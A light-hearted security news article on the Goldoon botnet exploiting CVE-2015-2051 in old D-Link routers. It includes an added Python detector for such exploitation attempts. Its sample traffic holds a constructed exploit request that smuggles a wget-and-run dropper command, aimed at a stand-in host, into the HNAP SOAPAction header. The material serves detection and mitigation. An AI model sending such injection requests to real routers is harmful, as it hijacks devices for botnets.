D-Link Disaster: Goldoon Botnet Hijacks Routers with Ancient Flaw for Stealthy Attacks

In a digital heist that’s both audacious and nostalgic, Goldoon botnet resurrects the ghost of CVE-2015-2051 to haunt old D-Link routers. Watch out – your router might just be the zombie in a DDoS thriller! 🧟‍♂️💻

Hot Take:

Hey, 2015 called; they want their router vulnerability back! Goldoon botnet is out here making a vintage security flaw the new black, turning D-Link routers into the cyber-equivalent of zombie extras in a B-movie about world domination through DDoS attacks. I mean, who needs time travel when hackers are recycling old hits like they’re on a nostalgia tour?!

Key Points:

  • Goldoon botnet is exploiting CVE-2015-2051, an oldie-but-a-goodie critical flaw in D-Link DIR-645 routers: unauthenticated command injection through the GetDeviceSettings action of the router's HNAP interface, because why not?
  • Successfully exploited devices become puppets that can launch further attacks, including the ever-so-classy DDoS.
  • The botnet’s payload is as universal as a Swiss Army knife, compatible with a buffet of Linux system architectures.
  • Attempts to directly access the malware’s endpoint are met with a cheeky “Sorry, you are an FBI Agent” message – talk about adding insult to injury.
  • While the rest of us update our TikTok dances, cybercriminals are updating their botnets, using old vulnerabilities to turn routers into covert cyber-spy dens.

Cve id: CVE-2015-2051
Cve state: PUBLISHED
Cve assigner short name: mitre
Cve date updated: 12/29/2016
Cve description: The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.

Need to know more?

Back to the Future: Botnet Edition

Most people revisit the past by flipping through photo albums, but it seems hackers prefer a more interactive approach. They've dusted off the CVE-2015-2051 vulnerability, giving it a new lease on life. This flaw is a command injection in the router's HNAP web service: one crafted request to the GetDeviceSettings action, which needs no password, gets attacker-supplied shell commands run on the device, which lets Goldoon control it better than any puppeteer could dream of. The initial spike in botnet activity was spotted around April 2024, just in time for spring cleaning – if by cleaning you mean sweeping up compromised devices.
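If you have a proxy, IDS or packet capture sitting in front of legacy gear, the attempt is not hard to spot, because the attacker has to smuggle shell syntax into a SOAP header. The Python below is an added example written for this page, not code from the article or from any vendor report. It assumes the injected command trails the action name inside the SOAPAction header (the shape public write-ups of CVE-2015-2051 describe); every request in SAMPLES, and every hostname and IP in them, is constructed for the demo.

```python
"""Spot CVE-2015-2051 (D-Link HNAP GetDeviceSettings) exploitation attempts
in captured HTTP requests.

Added example, not code from the original article or from a vendor report.
Assumption: the injected shell command rides in the SOAPAction header after
the action name, e.g.
    SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cmd`"
The requests in SAMPLES are constructed for this demo, not real captures.
"""
import re
from dataclasses import dataclass, field

# A well-formed HNAP SOAPAction is the purenetworks URI plus one action name
# and nothing else; anything trailing the action name deserves a look.
HNAP_ACTION_RE = re.compile(
    r'^"?http://purenetworks\.com/HNAP1/(?P<action>[A-Za-z]+)(?P<tail>.*?)"?$'
)
# Shell metacharacters that have no business inside a SOAPAction URI.
SHELL_META_RE = re.compile(r'`|\$\(|[;|&<>]')
# URLs embedded in an injected command (typically the dropper download).
URL_RE = re.compile(r'https?://[^\s`"\';|&<>]+')


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)   # keys lower-cased
    body: str = ""


@dataclass
class Finding:
    verdict: str            # "benign", "suspicious" or "exploit"
    action: str = ""        # HNAP action name, if one was parsed
    injected: str = ""      # text trailing the action name
    urls: list = field(default_factory=list)


def parse_request(raw: str) -> Request:
    """Minimal parser for one raw HTTP/1.1 request (CRLF line endings)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers, body)


def classify_hnap(req: Request) -> Finding:
    """Classify one request against the CVE-2015-2051 attempt pattern."""
    if not req.path.startswith("/HNAP1"):
        return Finding("benign")
    m = HNAP_ACTION_RE.match(req.headers.get("soapaction", ""))
    if m is None:
        # HNAP endpoint hit without a well-formed action: probing or fuzzing.
        return Finding("suspicious")
    action, tail = m.group("action"), m.group("tail")
    if SHELL_META_RE.search(tail):
        return Finding("exploit", action, tail, URL_RE.findall(tail))
    return Finding("benign", action)


def scan(raw_requests: dict) -> dict:
    """Map each named raw request to its Finding."""
    return {name: classify_hnap(parse_request(raw))
            for name, raw in raw_requests.items()}


# Constructed sample traffic using documentation (RFC 5737) addresses.
SAMPLES = {
    "legit_hnap": (
        "POST /HNAP1/ HTTP/1.1\r\n"
        "Host: 192.0.2.1\r\n"
        'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n'
        "Content-Type: text/xml\r\n"
        "\r\n"
        '<?xml version="1.0"?><soap:Envelope/>'
    ),
    "injection": (
        "POST /HNAP1/ HTTP/1.1\r\n"
        "Host: 192.0.2.1\r\n"
        'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
        "`cd /tmp; wget http://198.51.100.7/dropper.sh; sh dropper.sh`\"\r\n"
        "\r\n"
    ),
    "no_action": "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
    "unrelated": "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
}

if __name__ == "__main__":
    for name, finding in scan(SAMPLES).items():
        print(f"{name:12} {finding.verdict:10} {finding.action} {finding.urls}")
```

The discriminator is deliberately the shell metacharacters, not the action name: GetDeviceSettings is a legitimate, frequently called HNAP action, so alerting on the name alone would page you for every D-Link management client on the network. The URL pulled out of the injected command is the piece worth feeding into blocklists and retro-hunts, since it points at the dropper host.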

One Payload to Rule Them All

Goldoon isn't picky; it'll take any flavor of Linux system architecture it can get its hands on. Once the dropper script is in, it fetches the Goldoon build for whichever CPU the router happens to run, like a bad tenant that not only refuses to leave but also invites over all its rowdy friends (aka the Goldoon malware). The malicious payload makes itself at home, sets up shop, and then, like a ghost, tries to erase any evidence that it was ever there. Practical upshot for anyone poking at one of these boxes afterwards: don't count on finding the dropper or the binary sitting on the filesystem; the running process and its outbound connections are the better place to look.

Don't Feed the Trolls

It seems the botnet has both a sense of humor and a flair for drama. If you try to visit the malware's endpoint, it greets you with a snarky message for FBI agents, followed by an internet version of "I will look for you, I will find you, and I will kill you." Clearly, somebody's been watching too many spy movies.

Hide and Seek: Router Edition

These routers aren't just launching attacks; they're also playing a wicked game of cyber hide-and-seek. By using the hacked routers as proxies, malicious activities blend in with normal traffic, turning detection into a game for Sherlock Holmes. This isn't just a theory; it's happening right now, with the MooBot and Ngioweb botnets having a field day with Ubiquiti EdgeRouters.

Router's New Job: Covert Listening Posts

Last but not least, it turns out our routers are moonlighting as covert listening posts. They're quietly sitting there, collecting all sorts of network traffic, and probably gossiping about it with their botnet overlords. Trend Micro points out that internet routers are prized possessions in the cyber underworld due to their reduced security monitoring and powerful OS capabilities. So, the next time your router blinks at you, it might just be sending Morse code to its hacker buddies.

Remember kids, in the world of cybersecurity, what's old can be new again, and your router might just be the most popular device at the cybercrime party. Keep your firmware updated, and if the vendor has stopped supporting your model (the DIR-645 has been end-of-life for years, so a patch from 2015 is the last one it will ever see), keep the web interface, HNAP included, off the WAN side or retire the box altogether, or you might as well roll out the red carpet for these digital party crashers!

Tags: compromised devices, critical vulnerability, CVE-2015-2051, DDoS Attacks, Goldoon botnet, Remote Code Execution, Router Security